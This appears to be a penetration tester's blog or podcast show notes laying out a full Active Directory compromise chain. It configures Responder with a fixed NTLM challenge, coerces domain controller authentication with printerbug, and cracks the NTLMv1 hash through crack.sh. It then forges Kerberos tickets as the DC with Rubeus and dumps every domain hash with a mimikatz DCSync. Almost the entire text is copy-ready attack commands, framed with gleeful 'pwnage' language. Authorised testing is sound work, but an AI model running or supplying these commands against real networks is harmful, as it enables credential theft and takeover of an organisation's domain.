Ooooo giggidy! Today’s episode is about a pentest pwnage path that is super fun and interesting, and I’ve now seen 3-4 times in the wild. Here are some notes from the audio/video that will help bring this to life for you (oh and read this article for a great tech explanation of what’s happening under the hood):
Change the Responder.conf file like so:
; Custom challenge. ; Use "Random" for generating a random challenge for each requests (Default)Challenge = 1122334455667788
Run Responder with --disable-ess
flag
sudo python3 /opt/responder/Responder.py -I eth0 --disable-ess
Use printerbug to coax authentication from a domain controller:
sudo python3 /opt/krbrelay-dirkjanm/printerbug.py yourdomain.com/someuser@IP.OF.DOMAIN.CONTROLLER IP.OF.ATTACKING.BOX
Convert hash to make it easier to crack!
sudo python3 /opt/ntlmv1-multi/ntlmv1.py --ntlmv1 THE-HASH-YOU-GOT-FROM-RESPONDER
Take the NTHASH:XXX
token and go to crack.sh to have it cracked in about 30 seconds!
Now you can do a Rubeus asktgt
with the DC hash:
rubeus.exe asktgt /domain:yourdomain.com /user:DOMAIN-CONTROLLER-NAME$ /rc4:HASH-GOES-HERE /nowrap
Now pass the ticket and impersonate the DC LOL MUAHAHAHAHAHAHAAH!!
rubeus.exe ptt /ticket:TICKET GOES HERE
Use mimikatz to dump all hashes!
mimikatz.exeprivilege::debuglog hashes.txtlsadump::dcsync /domain:yourdomain.com /all /csv
Share on socials: